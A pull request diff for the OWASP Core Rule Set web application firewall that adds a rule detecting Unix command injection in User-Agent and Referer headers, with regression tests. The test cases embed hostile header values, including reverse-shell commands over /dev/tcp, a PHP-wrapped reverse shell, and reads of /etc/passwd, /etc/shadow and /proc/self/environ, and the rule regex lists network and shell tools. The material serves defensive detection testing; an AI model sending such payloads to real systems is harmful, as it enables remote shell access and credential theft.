### PR TITLE
fix: add rce detection in request headers

### DIFF
--- a/regex-assembly/932237.ra
+++ b/regex-assembly/932237.ra
@@ -1,0 +1,11 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regexp_assemble/.
+
+##!+ i
+
+##!^ \b
+
+##!$ \b
+
+##!> include unix-shell-upto3
+##!> include unix-shell-4andup-with-params

--- a/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf
+++ b/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf
@@ -99,6 +99,12 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:932012,phase:2,pass,nolog,skipAf
 #       - with and without prefix
 #       - words of any length
 #       - no excluded words)
+#  .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3,
+#       - targets request headers user-agent and referer only
+#       - without prefix
+#       - with word boundaries
+#       - words of any length
+#       - no excluded words)
 #
 #
 # Regular expression generated from regex-assembly/932230.ra.
@@ -145,6 +151,12 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 #  .932240 (generic detection, PL2, targets generic evasion attempts)
 #  .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2,
 #       - with and without prefix
+#       - words of any length
+#       - no excluded words)
+#  .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3,
+#       - targets request headers user-agent and referer only
+#       - without prefix
+#       - with word boundaries
 #       - words of any length
 #       - no excluded words)
 #
@@ -407,6 +419,12 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 #       - with and without prefix
 #       - words of any length
 #       - no excluded words)
+#  .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3,
+#       - targets request headers user-agent and referer only
+#       - without prefix
+#       - with word boundaries
+#       - words of any length
+#       - no excluded words)
 #
 #
 # Regular expression generated from regex-assembly/932250.ra.
@@ -452,6 +470,12 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 #  .932240 (generic detection, PL2, targets generic evasion attempts)
 #  .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2,
 #       - with and without prefix
+#       - words of any length
+#       - no excluded words)
+#  .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3,
+#       - targets request headers user-agent and referer only
+#       - without prefix
+#       - with word boundaries
 #       - words of any length
 #       - no excluded words)
 #
@@ -529,6 +553,11 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 # Some commands which were restricted in earlier rules due to FP,
 # have been added here with their full path, in order to catch some
 # cases where the full path is sent.
+#
+# Rule relations:
+#
+#  .932160 (base rule, PL1, unix shell commands with full path)
+#  ..932161 (stricter sibling, PL2, unix shell commands with full path in User-Agent and Referer request headers)
 #
 # This rule is also triggered by an Apache Struts Remote Code Execution exploit:
 # [ Apache Struts vulnerability CVE-2017-9805 - Exploit tested: https://www.exploit-db.com/exploits/42627 ]
@@ -806,6 +835,12 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:932014,phase:2,pass,nolog,skipAf
 #       - with and without prefix
 #       - words of any length
 #       - no excluded words)
+#  .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3,
+#       - targets request headers user-agent and referer only
+#       - without prefix
+#       - with word boundaries
+#       - words of any length
+#       - no excluded words)
 #
 #
 # Regular expression generated from regex-assembly/932231.ra.
@@ -957,6 +992,12 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 #  .932240 (generic detection, PL2, targets generic evasion attempts)
 #  .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2,
 #       - with and without prefix
+#       - words of any length
+#       - no excluded words)
+#  .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3,
+#       - targets request headers user-agent and referer only
+#       - without prefix
+#       - with word boundaries
 #       - words of any length
 #       - no excluded words)
 #
@@ -1157,6 +1198,12 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 #       - with and without prefix
 #       - words of any length
 #       - no excluded words)
+#  .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3,
+#       - targets request headers user-agent and referer only
+#       - without prefix
+#       - with word boundaries
+#       - words of any length
+#       - no excluded words)
 #
 #
 # Regular expression generated from regex-assembly/932236.ra.
@@ -1171,6 +1218,40 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     capture,\
     t:none,\
     msg:'Remote Command Execution: Unix Command Injection (command without evasion)',\
+    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+    tag:'application-multi',\
+    tag:'language-shell',\
+    tag:'platform-unix',\
+    tag:'attack-rce',\
+    tag:'paranoia-level/2',\
+    tag:'OWASP_CRS',\
+    tag:'capec/1000/152/248/88',\
+    tag:'PCI/6.5.2',\
+    ver:'OWASP_CRS/4.0.0-rc1',\
+    severity:'CRITICAL',\
+    setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
+    setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
+
+# [ Unix shell snippets ]
+#
+# Detect some common sequences found in shell commands and scripts.
+#
+# Some commands which were restricted in earlier rules due to FP,
+# have been added here with their full path, in order to catch some
+# cases where the full path is sent.
+#
+# Rule relations:
+#
+#  .932160 (base rule, PL1, unix shell commands with full path)
+#  ..932161 (stricter sibling, PL2, unix shell commands with full path in User-Agent and Referer request headers)
+#
+SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@pmFromFile unix-shell.data" \
+    "id:932161,\
+    phase:2,\
+    block,\
+    capture,\
+    t:none,t:cmdLine,t:normalizePath,\
+    msg:'Remote Command Execution: Unix Shell Code Found in REQUEST_HEADERS',\
     logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
     tag:'application-multi',\
     tag:'language-shell',\
@@ -1211,6 +1292,12 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:932016,phase:2,pass,nolog,skipAf
 #       - with and without prefix
 #       - words of any length
 #       - no excluded words)
+#  .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3,
+#       - targets request headers user-agent and referer only
+#       - without prefix
+#       - with word boundaries
+#       - words of any length
+#       - no excluded words)
 #
 #
 # Regular expression generated from regex-assembly/932232.ra.
@@ -1238,6 +1325,33 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
+
+# Regular expression generated from regex-assembly/932237.ra.
+# To update the regular expression run the following shell script
+# (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
+#   crs-toolchain regex update 932237
+#
+SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx (?i)\b(?:7z[ar]?|a(?:b|pt(?:-get)?|r(?:[jp]|ch[\s\v<>]|ia2c)?|s(?:h|cii(?:-xfr|85)|pell)?|t(?:obm)?|w[ks]|dduser|getty|l(?:ias|pine)[\s\v<>]|nsible-playbook)|b(?:z(?:z|c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2|less|more)|a(?:s(?:e(?:32|64|nc)|h)|tch[\s\v<>])|pftrace|r(?:eaksw|idge[\s\v<>])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\v<>]|zip2)|s(?:ctl|ybox))|yebug)|c(?:[8-9]9|a(?:t|(?:ncel|psh)[\s\v<>])|c|mp|p(?:an|io|ulimit)?|s(?:h|plit|vtool)|u(?:t|psfilter|rl)|ertbot|h(?:attr|dir[\s\v<>]|eck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|flags|mod|o(?:om|wn)|root)|o(?:(?:b|pro)c|lumn[\s\v<>]|m(?:m(?:and[\s\v<>])?|p(?:oser|ress[\s\v<>]))|w(?:say|think))|r(?:ash[\s\v<>]|ontab))|d(?:[du]|i(?:g|(?:alog|ff)[\s\v<>])|nf|a(?:sh|te)[\s\v<>]|hclient|m(?:esg|idecode|setup)|o(?:as|(?:cker|ne)[\s\v<>]|sbox)|pkg|vips)|e(?:[bd]|n(?:v(?:-update)?|d(?:if|sw))|qn|x(?:ec[\s\v<>]|iftool|p(?:(?:and|(?:ec|or)t)[\s\v<>]|r))?|(?:asy_instal|va)l|cho[\s\v<>]|fax|grep|macs|sac)|f(?:c|i(?:le(?:[\s\v<>]|test)|(?:n(?:d|ger)|sh)[\s\v<>])?|mt|tp(?:stats|who)?|acter|(?:etch|lock)[\s\v<>]|grep|o(?:ld[\s\v<>]|reach)|ping|unction)|g(?:c(?:c|ore)|db|e(?:m|ni(?:e[\s\v<>]|soimage)|tfacl[\s\v<>])|hci?|i(?:t|mp[\s\v<>]|nsh)|o|r(?:c|ep[\s\v<>])|awk|tester|unzip|z(?:cat|exe|ip))|h(?:d|up|e(?:ad[\s\v<>]|xdump)|i(?:ghlight|story)[\s\v<>]|ost(?:id|name)|ping3|t(?:digest|passwd))|i(?:d|p(?:6?tables|config)?|rb|conv|f(?:config|top)|nstall[\s\v<>]|onice|spell)|j(?:js|q|ava[\s\v<>]|exec|o(?:(?:bs|in)[\s\v<>]|urnalctl)|runscript)|k(?:s(?:h|shell)|ill(?:[\s\v<>]|all)|nife[\s\v<>])|l(?:d(?:d|config)?|[np]|s(?:-F|b_release|cpu|hw|mod|of|pci|usb)?|ua(?:(?:la)?tex)?|z(?:c(?:at|mp)|diff|[e-f]?grep|less|m(?:a|ore))?|a(?:st(?:[\s\v<>]|comm|log(?:in)?)|tex[\s\v<>])|ess(?:[\s\v<>]|echo|(?:fil|pip)e)|ftp(?:get)?|(?:inks|ynx)[\s\v<>]|o(?:(?:ca(?:l|te)|ok)[\s\v<>]|g(?:inctl|(?:nam|sav)e))|trace|wp-(?:d(?:ownload|ump)|mirror|request))|m(?:a(?:n|il(?:q|x[\s\v<>])?|ke[\s\v<>]|wk)|tr|v|(?:kdir|utt)[\s\v<>]|locate|o(?:(?:re|unt)[\s\v<>]|squitto)|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|ysql(?:admin|dump(?:slow)?|hotcopy|show)?)|n(?:c(?:\.(?:openbsd|traditional)|at)?|e(?:t(?:(?:c|st)at|kit-ftp)?|ofetch)|l|m(?:ap)?|p(?:m|ing)|a(?:no[\s\v<>]|sm|wk)|ice[\s\v<>]|o(?:de[\s\v<>]|hup)|roff|s(?:enter|lookup|tat))|o(?:d|ctave[\s\v<>]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg))|p(?:a(?:x|s(?:swd|te[\s\v<>])|tch[\s\v<>])|d(?:b|f(?:la)?tex)|f(?:tp)?|g(?:rep)?|hp|i(?:c(?:o[\s\v<>])?|p|dstat|gz|ng[\s\v<>])|k(?:g(?:_?info)?|exec|ill)|r(?:y|int(?:env|f[\s\v<>]))?|s(?:ftp|ql)?|t(?:x|ar(?:diff|grep)?)|xz|er(?:f|l(?:5|sh)?|ms)|opd|ython[^\s\v]|u(?:ppet[\s\v<>]|shd))|r(?:a(?:r|k(?:e[\s\v<>]|u))|cp|e(?:d(?:carpet[\s\v<>])?|v|a(?:delf|lpath)|(?:name|p(?:eat|lace))[\s\v<>]|stic)|m(?:dir[\s\v<>]|user)?|pm(?:db|(?:quer|verif)y)?|l(?:ogin|wrap)|nano|oute[\s\v<>]|sync|u(?:by[^\s\v]|n-(?:mailcap|parts))|vi(?:ew|m))|s(?:c(?:p|hed|r(?:een|ipt)[\s\v<>])|e(?:d|t(?:arch|env|facl[\s\v<>]|sid)?|ndmail|rvice[\s\v<>])|g|h(?:\.distrib|ell|u(?:f|tdown[\s\v<>]))?|s(?:h(?:-key(?:ge|sca)n|pass)?)?|u(?:do)?|vn|(?:ash|nap|plit)[\s\v<>]|diff|ftp|l(?:eep[\s\v<>]|sh)|mbclient|o(?:cat|elim|(?:rt|urce)[\s\v<>])|qlite3|t(?:art-stop-daemon|dbuf|r(?:ace|ings))|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:[cr]|il[\s\v<>f]|sk(?:set)?)|bl|e(?:[ex]|lnet)|i(?:c|me(?:(?:out)?[\s\v<>]|datectl))|o(?:p|uch[\s\v<>])|c(?:l?sh|p(?:dump|ing|traceroute))|ftp|mux|r(?:aceroute6?|off)|shark)|u(?:l(?:imit[\s\v<>])?|n(?:ame|compress|expand|iq|l(?:ink[\s\v<>]|z(?:4|ma))|(?:pig|x)z|rar|s(?:et|hare)[\s\v<>]|z(?:ip|std))|pdate-alternatives|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:i(?:m(?:diff)?|ew[\s\v<>]|gr|pw|rsh)?|algrind|olatility)|w(?:3m|c|h(?:o(?:ami|is)?|iptail)|a(?:ll|tch)[\s\v<>]|get|i(?:reshark|sh[\s\v<>]))|x(?:(?:x|pa)d|z(?:c(?:at|mp)|d(?:ec|iff)|[e-f]?grep|less|more)?|args|e(?:la)?tex|mo(?:dmap|re)|term)|y(?:um|arn|elp[\s\v<>])|z(?:ip(?:details)?|s(?:h|oelim|td)|athura|c(?:at|mp)|diff|[e-f]?grep|less|more|run|ypper))\b" \
+    "id:932237,\
+    phase:2,\
+    block,\
+    capture,\
+    t:none,t:cmdLine,t:normalizePath,\
+    msg:'Remote Command Execution: Unix Shell Code Found in REQUEST_HEADERS',\
+    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+    tag:'application-multi',\
+    tag:'language-shell',\
+    tag:'platform-unix',\
+    tag:'attack-rce',\
+    tag:'paranoia-level/3',\
+    tag:'OWASP_CRS',\
+    tag:'capec/1000/152/248/88',\
+    tag:'PCI/6.5.2',\
+    ver:'OWASP_CRS/4.0.0-rc1',\
+    severity:'CRITICAL',\
+    setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
+    setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
+
 
 #
 # -=[ Bypass Rule 930120 (wildcard) ]=-

--- a/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf
+++ b/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf
@@ -1326,6 +1326,30 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
 
+# [ Unix command injection ]
+#
+# Rule relations:
+#
+#  .932230 (base rule, PL1, targets prefix + two and three character commands)
+#  ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command)
+#  ..932232 (stricter sibling, PL3, targets prefix + additional command words)
+#  .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion)
+#
+#  .932250 (base rule, PL1, targets two and three character commands)
+#  .932260 (base rule, PL1, targets known command word of length > 3 without evasion)
+#
+#  .932240 (generic detection, PL2, targets generic evasion attempts)
+#  .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2,
+#       - with and without prefix
+#       - words of any length
+#       - no excluded words)
+#  .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3,
+#       - targets request headers user-agent and referer only
+#       - without prefix
+#       - with word boundaries
+#       - words of any length
+#       - no excluded words)
+#
 # Regular expression generated from regex-assembly/932237.ra.
 # To update the regular expression run the following shell script
 # (consult https://coreruleset.org/docs/development/regex_assembly/ for details):

--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml
@@ -93,3 +93,98 @@ tests:
             protocol: "http"
           output:
             log_contains: "id \"932161\""
+  - test_title: 932161-7
+    stages:
+      - stage:
+          input:
+            dest_addr: "127.0.0.1"
+            method: "GET"
+            port: 80
+            headers:
+              User-Agent: OWASP ModSecurity Core Rule Set
+              Referer: cat /etc/passwd
+              Host: "localhost"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            uri: "/"
+            protocol: "http"
+          output:
+            log_contains: "id \"932161\""
+  - test_title: 932161-8
+    stages:
+      - stage:
+          input:
+            dest_addr: "127.0.0.1"
+            method: "GET"
+            port: 80
+            headers:
+              User-Agent: OWASP ModSecurity Core Rule Set
+              Referer: /etc/shadow
+              Host: "localhost"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            uri: "/"
+            protocol: "http"
+          output:
+            log_contains: "id \"932161\""
+  - test_title: 932161-9
+    stages:
+      - stage:
+          input:
+            dest_addr: "127.0.0.1"
+            method: "GET"
+            port: 80
+            headers:
+              User-Agent: OWASP ModSecurity Core Rule Set
+              Referer: cat /proc/self/environ
+              Host: "localhost"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            protocol: "http"
+          output:
+            log_contains: "id \"932161\""
+  - test_title: 932161-10
+    stages:
+      - stage:
+          input:
+            dest_addr: "127.0.0.1"
+            method: "GET"
+            port: 80
+            headers:
+              User-Agent: OWASP ModSecurity Core Rule Set
+              Referer: dd if=/etc/passwd of=/tmp/evil.sh bs=1 skip=22 count=9
+              Host: "localhost"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            uri: '/'
+            protocol: "http"
+          output:
+            log_contains: "id \"932161\""
+  - test_title: 932161-11
+    stages:
+      - stage:
+          input:
+            dest_addr: "127.0.0.1"
+            method: "GET"
+            port: 80
+            headers:
+              User-Agent: OWASP ModSecurity Core Rule Set
+              Referer: /bin/bash -c "sh -i>& /dev/tcp/172.17.0.1/54321 0>&1"
+              Host: "localhost"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            uri: '/'
+            protocol: "http"
+          output:
+            log_contains: "id \"932161\""
+  - test_title: 932161-12
+    stages:
+      - stage:
+          input:
+            dest_addr: "127.0.0.1"
+            method: "GET"
+            port: 80
+            headers:
+              User-Agent: OWASP ModSecurity Core Rule Set
+              Referer: <?php `/bin/bash -c \'sh -i>&/dev/tcp/172.17.0.1/54321 0>&1\'`; ?>
+              Host: "localhost"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            uri: '/'
+            protocol: "http"
+          output:
+            log_contains: "id \"932161\""

--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml
@@ -1,0 +1,95 @@
+---
+meta:
+  author: "Franziska Bühler"
+  enabled: true
+  name: "932161.yaml"
+tests:
+  - test_title: 932161-1
+    stages:
+      - stage:
+          input:
+            dest_addr: "127.0.0.1"
+            method: "GET"
+            port: 80
+            headers:
+              User-Agent: cat /etc/passwd
+              Host: "localhost"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            uri: "/"
+            protocol: "http"
+          output:
+            log_contains: "id \"932161\""
+  - test_title: 932161-2
+    stages:
+      - stage:
+          input:
+            dest_addr: "127.0.0.1"
+            method: "GET"
+            port: 80
+            headers:
+              User-Agent: /etc/shadow
+              Host: "localhost"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            uri: "/"
+            protocol: "http"
+          output:
+            log_contains: "id \"932161\""
+  - test_title: 932161-3
+    stages:
+      - stage:
+          input:
+            dest_addr: "127.0.0.1"
+            method: "GET"
+            port: 80
+            headers:
+              User-Agent: cat /proc/self/environ
+              Host: "localhost"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            protocol: "http"
+          output:
+            log_contains: "id \"932161\""
+  - test_title: 932161-4
+    stages:
+      - stage:
+          input:
+            dest_addr: "127.0.0.1"
+            method: "GET"
+            port: 80
+            headers:
+              User-Agent: dd if=/etc/passwd of=/tmp/evil.sh bs=1 skip=22 count=9
+              Host: "localhost"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            uri: '/'
+            protocol: "http"
+          output:
+            log_contains: "id \"932161\""
+  - test_title: 932161-5
+    stages:
+      - stage:
+          input:
+            dest_addr: "127.0.0.1"
+            method: "GET"
+            port: 80
+            headers:
+              User-Agent: /bin/bash -c "sh -i>& /dev/tcp/172.17.0.1/54321 0>&1"
+              Host: "localhost"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            uri: '/'
+            protocol: "http"
+          output:
+            log_contains: "id \"932161\""
+  - test_title: 932161-6
+    stages:
+      - stage:
+          input:
+            dest_addr: "127.0.0.1"
+            method: "GET"
+            port: 80
+            headers:
+              User-Agent: <?php `/bin/bash -c \'sh -i>&/dev/tcp/172.17.0.1/54321 0>&1\'`; ?>
+              Host: "localhost"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            uri: '/'
+            protocol: "http"
+          output:
+            log_contains: "id \"932161\""

--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml
@@ -101,7 +101,7 @@ tests:
             method: "GET"
             port: 80
             headers:
-              User-Agent: OWASP ModSecurity Core Rule Set
+              User-Agent: OWASP CRS test agent
               Referer: cat /etc/passwd
               Host: "localhost"
               Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
@@ -117,7 +117,7 @@ tests:
             method: "GET"
             port: 80
             headers:
-              User-Agent: OWASP ModSecurity Core Rule Set
+              User-Agent: OWASP CRS test agent
               Referer: /etc/shadow
               Host: "localhost"
               Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
@@ -133,7 +133,7 @@ tests:
             method: "GET"
             port: 80
             headers:
-              User-Agent: OWASP ModSecurity Core Rule Set
+              User-Agent: OWASP CRS test agent
               Referer: cat /proc/self/environ
               Host: "localhost"
               Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
@@ -148,7 +148,7 @@ tests:
             method: "GET"
             port: 80
             headers:
-              User-Agent: OWASP ModSecurity Core Rule Set
+              User-Agent: OWASP CRS test agent
               Referer: dd if=/etc/passwd of=/tmp/evil.sh bs=1 skip=22 count=9
               Host: "localhost"
               Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
@@ -164,7 +164,7 @@ tests:
             method: "GET"
             port: 80
             headers:
-              User-Agent: OWASP ModSecurity Core Rule Set
+              User-Agent: OWASP CRS test agent
               Referer: /bin/bash -c "sh -i>& /dev/tcp/172.17.0.1/54321 0>&1"
               Host: "localhost"
               Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
@@ -180,7 +180,7 @@ tests:
             method: "GET"
             port: 80
             headers:
-              User-Agent: OWASP ModSecurity Core Rule Set
+              User-Agent: OWASP CRS test agent
               Referer: <?php `/bin/bash -c \'sh -i>&/dev/tcp/172.17.0.1/54321 0>&1\'`; ?>
               Host: "localhost"
               Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml
@@ -1,0 +1,80 @@
+---
+meta:
+  author: "Franziska Bühler"
+  enabled: true
+  name: "932237.yaml"
+tests:
+  - test_title: 932237-1
+    stages:
+      - stage:
+          input:
+            dest_addr: "127.0.0.1"
+            method: "GET"
+            port: 80
+            headers:
+              User-Agent: env
+              Host: "localhost"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            uri: "/"
+            protocol: "http"
+          output:
+            log_contains: "id \"932237\""
+  - test_title: 932237-2
+    stages:
+      - stage:
+          input:
+            dest_addr: "127.0.0.1"
+            method: "GET"
+            port: 80
+            headers:
+              User-Agent: id
+              Host: "localhost"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            uri: "/"
+            protocol: "http"
+          output:
+            log_contains: "id \"932237\""
+  - test_title: 932237-3
+    stages:
+      - stage:
+          input:
+            dest_addr: "127.0.0.1"
+            method: "GET"
+            port: 80
+            headers:
+              User-Agent: set
+              Host: "localhost"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            protocol: "http"
+          output:
+            log_contains: "id \"932237\""
+  - test_title: 932237-4
+    stages:
+      - stage:
+          input:
+            dest_addr: "127.0.0.1"
+            method: "GET"
+            port: 80
+            headers:
+              User-Agent: settings
+              Host: "localhost"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            uri: '/'
+            protocol: "http"
+          output:
+            no_log_contains: "id \"932237\""
+  - test_title: 932237-5
+    stages:
+      - stage:
+          input:
+            dest_addr: "127.0.0.1"
+            method: "GET"
+            port: 80
+            headers:
+              User-Agent: environment
+              Host: "localhost"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            uri: '/'
+            protocol: "http"
+          output:
+            no_log_contains: "id \"932237\""

--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml
@@ -86,7 +86,7 @@ tests:
             method: "GET"
             port: 80
             headers:
-              User-Agent: OWASP ModSecurity CRS
+              User-Agent: OWASP CRS test agent
               Referer: env
               Host: "localhost"
               Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
@@ -102,7 +102,7 @@ tests:
             method: "GET"
             port: 80
             headers:
-              User-Agent: OWASP ModSecurity CRS
+              User-Agent: OWASP CRS test agent
               Referer: id
               Host: "localhost"
               Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
@@ -118,7 +118,7 @@ tests:
             method: "GET"
             port: 80
             headers:
-              User-Agent: OWASP ModSecurity CRS
+              User-Agent: OWASP CRS test agent
               Referer: set
               Host: "localhost"
               Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
@@ -133,7 +133,7 @@ tests:
             method: "GET"
             port: 80
             headers:
-              User-Agent: OWASP ModSecurity CRS
+              User-Agent: OWASP CRS test agent
               Referer: settings
               Host: "localhost"
               Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
@@ -149,7 +149,7 @@ tests:
             method: "GET"
             port: 80
             headers:
-              User-Agent: OWASP ModSecurity CRS
+              User-Agent: OWASP CRS test agent
               Referer: environment
               Host: "localhost"
               Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml
@@ -78,3 +78,82 @@ tests:
             protocol: "http"
           output:
             no_log_contains: "id \"932237\""
+  - test_title: 932237-6
+    stages:
+      - stage:
+          input:
+            dest_addr: "127.0.0.1"
+            method: "GET"
+            port: 80
+            headers:
+              User-Agent: OWASP ModSecurity CRS
+              Referer: env
+              Host: "localhost"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            uri: "/"
+            protocol: "http"
+          output:
+            log_contains: "id \"932237\""
+  - test_title: 932237-7
+    stages:
+      - stage:
+          input:
+            dest_addr: "127.0.0.1"
+            method: "GET"
+            port: 80
+            headers:
+              User-Agent: OWASP ModSecurity CRS
+              Referer: id
+              Host: "localhost"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            uri: "/"
+            protocol: "http"
+          output:
+            log_contains: "id \"932237\""
+  - test_title: 932237-8
+    stages:
+      - stage:
+          input:
+            dest_addr: "127.0.0.1"
+            method: "GET"
+            port: 80
+            headers:
+              User-Agent: OWASP ModSecurity CRS
+              Referer: set
+              Host: "localhost"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            protocol: "http"
